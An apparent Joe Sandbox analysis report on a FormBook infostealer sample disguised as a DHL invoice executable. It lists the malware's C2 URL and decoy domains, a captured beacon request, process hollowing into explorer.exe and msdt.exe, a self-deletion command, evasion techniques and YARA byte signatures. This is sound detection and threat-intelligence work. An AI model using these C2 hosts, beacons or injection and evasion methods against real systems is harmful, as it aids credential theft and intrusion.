Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report invoice dhl.delivery document and original invoice sign.exe

Overview

General Information

Sample Name:invoice dhl.delivery document and original invoice sign.exe
Analysis ID:532858
MD5:ebce26da75669d94dbc0550bf394b204
SHA1:bcc8f769e51cd9f8a160e58840f80a008e2b72e2
SHA256:5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
Tags:DHLexeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Executable has a suspicious name (potential lure to open the executable)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Creates processes with suspicious names
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • invoice dhl.delivery document and original invoice sign.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: EBCE26DA75669D94DBC0550BF394B204)
    • invoice dhl.delivery document and original invoice sign.exe (PID: 6188 cmdline: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe MD5: EBCE26DA75669D94DBC0550BF394B204)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msdt.exe (PID: 7056 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
          • cmd.exe (PID: 7092 cmdline: /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 16 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Possible Applocker BypassShow sources
          Source: Process startedAuthor: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3440, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 7056

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.cuteprofessionalscrubs.com/9gr5/"], "decoy": ["newleafcosmetix.com", "richermanscastle.com", "ru-remonton.com", "2diandongche.com", "federaldados.design", "jeffreycookweb.com", "facecs.online", "xmeclarn.xyz", "olgasmith.xyz", "sneakersonlinesale.com", "playboyshiba.com", "angelamiglioli.com", "diitaldefynd.com", "whenevergames.com", "mtheartcustom.com", "vitalactivesupply.com", "twistblogr.com", "xn--i8s140at3d6u7c.tel", "baudelaireelhakim.com", "real-estate-miami-searcher.site", "131122.xyz", "meta-medial.com", "carvanaworkers.com", "mimamincloor.com", "aglutinarteshop.com", "portal-arch.com", "mandeide.com", "golfteesy.com", "carteretcancer.center", "cuansamping.com", "jhhnet.com", "oetthalr.xyz", "toesonly.com", "ctbizmag.com", "searchonzippy.com", "plantedapts.com", "matoneg.online", "takened.xyz", "meta4.life", "africanizedfund.com", "jukeboxjason.com", "folez.online", "troddu.com", "802135.com", "guiamat.net", "gladiasol.com", "meditationandyogacentre.com", "metaverserealestateagent.com", "boogyverse.net", "melissa-mochafest.com", "cozsweeps.com", "pickles-child.com", "metaversemediaschool.com", "ahfyfz.com", "ses-coating.com", "pozada.biz", "loldollmagic.com", "mountfrenchlodge.net", "25680125.xyz", "inusuklearning.com", "dnteagcud.xyz", "yupan.site", "acloud123.xyz", "asadosdonchorizo.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: invoice dhl.delivery document and original invoice sign.exeReversingLabs: Detection: 28%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: invoice dhl.delivery document and original invoice sign.exe, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000003.361108586.0000000001000000.00000004.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.437330999.000000000155F000.00000040.00000001.sdmp, msdt.exe, msdt.exe, 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp, msdt.exe, 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp
          Source: Binary string: msdt.pdb source: invoice dhl.delivery document and original invoice sign.exe, 00000003.00000002.438653461.00000000033D0000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exeDomain query: www.mimamincloor.com
          Source: C:\Windows\explorer.exeDomain query: www.federaldados.design
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.cuteprofessionalscrubs.com/9gr5/
          Source: global trafficHTTP traffic detected: GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1Host: www.federaldados.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 44.227.76.166 44.227.76.166
          Source: msdt.exe, 0000000B.00000002.623782144.00000000052FF000.00000004.00020000.sdmpString found in binary or memory: http://federaldados.design
          Source: explorer.exe, 00000005.00000000.397083667.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383799342.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425291445.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.365143157.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: unknownDNS traffic detected: queries for: www.federaldados.design
          Source: global trafficHTTP traffic detected: GET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1Host: www.federaldados.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.invoice dhl.delivery document and original invoice sign.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: invoice dhl.delivery document and original invoice sign.exe
          Source: initial sampleStatic PE information: Filename: invoice dhl.delivery document and original invoice sign.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: invoice dhl.delivery document and original invoice sign.exeStatic file information: Suspicious name
          Source: invoice dhl.delivery document and original invoice sign.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.invoice dhl.delivery document and original invoice sign.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
